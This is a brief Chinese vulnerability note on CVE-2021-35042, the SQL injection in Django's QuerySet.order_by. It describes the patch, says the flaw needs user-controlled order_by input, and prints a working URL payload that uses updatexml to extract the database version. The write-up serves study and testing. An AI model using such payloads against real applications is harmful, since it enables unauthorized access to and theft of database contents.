当前位置: 首页 > news >正文

Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

 

相关文章:

  • Unity中颜色空间Gamma与Linear
  • Locust AI 例子
  • EtherCAT主站SOEM -- 8 -- SOEM之 ec_slave 结构体详细分析
  • 一种全新且灵活的 Prompt 对齐优化技术
  • Mysql面经
  • 量化交易:筹码理论的探索-筹码分布计算的实现
  • 2022年12月 Scratch(三级)真题解析#中国电子学会#全国青少年软件编程等级考试
  • Calling PeopleTools APIs 调用PeopleTools API
  • GPU和CPU的联系和区别是什么,各自有什么特点,
  • Java基准测试工具JMH的简介与使用
  • Day45:300.最长递增子序列、674. 最长连续递增序列、718. 最长重复子数组
  • Node.js下载安装及配置镜像源
  • vivo开发者链接
  • 机器学习/sklearn 笔记:K-means,kmeans++,MiniBatchKMeans,二分Kmeans
  • python .pyc文件(字节码文件)(字节码与机器码区别)
  • 【知识碎片】第三方登录弹窗效果
  • Android组件 - 收藏集 - 掘金
  • ES6 ...操作符
  • Java编程基础24——递归练习
  • JS实现简单的MVC模式开发小游戏
  • magento2项目上线注意事项
  • nodejs调试方法
  • Python爬虫--- 1.3 BS4库的解析器
  • Webpack入门之遇到的那些坑,系列示例Demo
  • 纯 javascript 半自动式下滑一定高度,导航栏固定
  • 前端攻城师
  • 嵌入式文件系统
  • 我与Jetbrains的这些年
  • PostgreSQL 快速给指定表每个字段创建索引 - 1
  • # centos7下FFmpeg环境部署记录
  • # MySQL server 层和存储引擎层是怎么交互数据的?
  • (1)bark-ml
  • (JSP)EL——优化登录界面,获取对象,获取数据
  • (超详细)2-YOLOV5改进-添加SimAM注意力机制
  • (附源码)spring boot校园健康监测管理系统 毕业设计 151047
  • (论文阅读23/100)Hierarchical Convolutional Features for Visual Tracking
  • (亲测)设​置​m​y​e​c​l​i​p​s​e​打​开​默​认​工​作​空​间...
  • (图)IntelliTrace Tools 跟踪云端程序
  • (一)硬件制作--从零开始自制linux掌上电脑(F1C200S) <嵌入式项目>
  • (译)2019年前端性能优化清单 — 下篇
  • (原创)Stanford Machine Learning (by Andrew NG) --- (week 9) Anomaly DetectionRecommender Systems...
  • (源码版)2024美国大学生数学建模E题财产保险的可持续模型详解思路+具体代码季节性时序预测SARIMA天气预测建模
  • (转)socket Aio demo
  • (转)一些感悟
  • (转)自己动手搭建Nginx+memcache+xdebug+php运行环境绿色版 For windows版
  • .NET CF命令行调试器MDbg入门(四) Attaching to Processes
  • .NET Core跨平台微服务学习资源
  • [Angularjs]ng-select和ng-options
  • [AutoSar]BSW_Com02 PDU详解
  • [Design Pattern] 工厂方法模式
  • [Django 0-1] Core.Email 模块
  • [Golang]K-V存储引擎的学习 从零实现 (RoseDB mini版本)
  • [iOS]GCD(一)
  • [JavaWeb学习] Spring Ioc和DI概念思想
  • [k8s系列]:kubernetes·概念入门